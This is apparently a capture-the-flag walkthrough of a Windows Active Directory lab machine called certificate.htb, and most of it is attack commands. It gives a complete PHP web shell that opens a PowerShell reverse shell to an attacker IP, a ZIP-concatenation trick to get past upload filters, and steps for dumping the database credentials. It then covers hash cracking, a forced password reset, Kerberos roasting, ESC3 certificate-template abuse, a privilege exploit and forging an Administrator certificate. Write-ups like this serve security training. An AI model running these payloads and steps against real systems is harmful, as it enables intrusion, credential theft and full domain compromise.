Reconnaissance
Initial enumeration begins with web crawling and discovery of the target domains.
echo "http://certificate.htb" | hakrawler -d 10 > hakrawler.txt
During the web recon, a potentially vulnerable Google Maps API key was discovered, though it led to a dead end. Proceeding with authenticated enumeration using a session cookie (representing a logged-in student):
echo "http://certificate.htb/courses.php" | hakrawler -h "Cookie: PHPSESSID=llmr6293o0f9f5vjrsi8kbjnfr" -d 10 -insecure > hakrawler.txt
This reveals an interesting upload endpoint:
http://certificate.htb/upload.php?s_id=ID
Initial Access: Evasive ZIP Upload
The application accepts ZIP file uploads but blocks scripts. A known evasion technique involves concatenating a legitimate ZIP with a malicious ZIP to bypass basic filters.
Creating the Payload
Generate a malicious PHP web shell utilizing PowerShell for a reverse connection:
// shell.php
<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
Concatenating ZIP Files
mkdir malicious_files
mv shell.php malicious_files/
zip -r malicious.zip malicious_files/
zip benign.zip legit.pdf
cat benign.zip malicious.zip > combined.zip
After uploading combined.zip, the application extracts it. The malicious payload is triggered via:
http://certificate.htb/static/extracted-path/malicious_files/shell.php
Internal Enumeration & Credential Extraction
Once a foothold is established in the xampp directory, local enumeration yields database credentials.
Get-ChildItem -Recurse -Filter "db.php" -ErrorAction SilentlyContinue
Extracting db.php reveals database credentials for certificate_webapp_user:
$db_user = 'certificate_webapp_user';
$db_passwd = '[REDACTED]';
Extract the database using mysqldump to obtain user hashes:
cmd /c mysqldump -u certificate_webapp_user -p"[REDACTED]" Certificate_WEBAPP_DB > backup.sql 2>&1
Transfer the backup file using base64 encoding or via an SMB server. The SQL dump contains password hashes. Cracking the hash for sara.b:
hashcat -m 3200 -a 0 hash_sara /usr/share/wordlists/rockyou.txt
# Result: [REDACTED]
Authenticate via WinRM:
evil-winrm -i certificate.htb -u sara.b@certificate.htb -p '[REDACTED]'
Active Directory Pivot
Option 1: GenericAll Exploitation
Using BloodHound, it is discovered that sara.b has GenericAll privileges over two other users (lion.sk and ryan.k).
bloodhound-python -d certificate.htb -u sara.b@certificate.htb -p "[REDACTED]" -gc DC01.certificate.htb -c all -ns 10.129.171.26
Force-reset the password for lion.sk:
net rpc password "lion.sk" "[REDACTED]" -U "certificate.htb"/"sara.b"%"[REDACTED]" -S "DC01.certificate.htb"
evil-winrm -i certificate.htb -u lion.sk@certificate.htb -p '[REDACTED]'
Option 2: PCAP Analysis & AS-REP Roasting
Alternatively, a packet capture file (WS-01_PktMon.pcap) found in Sara's documents contains Kerberos traffic. Extracting it:
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Users\Sara.B\Documents\WS-01\WS-01_PktMon.pcap")) > C:\xampp\htdocs\certificate.htb\static\pkt.b64
Using Krb5RoastParser on the PCAP:
python3 krb5_roast_parser.py WS-01_PktMon.pcap as_req
Extract the hash, append .HTB to the target domain, and crack it:
hashcat -m 19900 kerberos.hash /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt
# Result: [REDACTED]
Privilege Escalation
Checking privileges for lion.sk:
whoami /priv
Active Directory Certificate Services (ESC3)
Run certipy to identify vulnerable certificate templates:
certipy find -vulnerable -u lion.sk@certificate.htb -p '[REDACTED]' -dc-ip 10.129.42.143 -stdout
The output highlights Delegated-CRA as vulnerable to ESC3 (Enrollment Agent Certificate Template). Request a certificate using lion.sk and forge a certificate on behalf of ryan.k, who possesses SeManageVolumePrivilege.
certipy req -u 'lion.sk@certificate.htb' -p '[REDACTED]' -dc-ip '10.129.42.143' -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'Delegated-CRA'
certipy req -u 'lion.sk@certificate.htb' -p '[REDACTED]' -dc-ip '10.129.42.143' -target 'DC01.certificate.htb' -ca 'Certificate-LTD-CA' -template 'SignedUser' -pfx 'lion.sk.pfx' -on-behalf-of 'CERTIFICATE\ryan.k'
certipy auth -pfx 'ryan.k.pfx' -dc-ip '10.129.42.143'
Extract the NT hash and authenticate as ryan.k:
evil-winrm -i certificate.htb -u ryan.k@certificate.htb -H [REDACTED]
Abusing SeManageVolumePrivilege
ryan.k has SeManageVolumePrivilege. Using the SeManageVolumeExploit:
update SeManageVolumeExploit.exe
cmd /c SeManageVolumeExploit.exe
This exploit grants full permissions to the C:\ drive. Retrieve the root CA certificate:
certutil -exportPFX my "Certificate-LTD-CA" C:\Users\Public\ca.pfx
Transfer ca.pfx to the attacking machine and forge a Golden Ticket for Administrator:
certipy forge -ca-pfx ca.pfx -out golden_ticket.pfx -upn Administrator
certipy auth -pfx golden_ticket.pfx -dc-ip 10.129.42.143 -user Administrator -domain certificate.htb
Retrieve the NT hash for Administrator and obtain root access.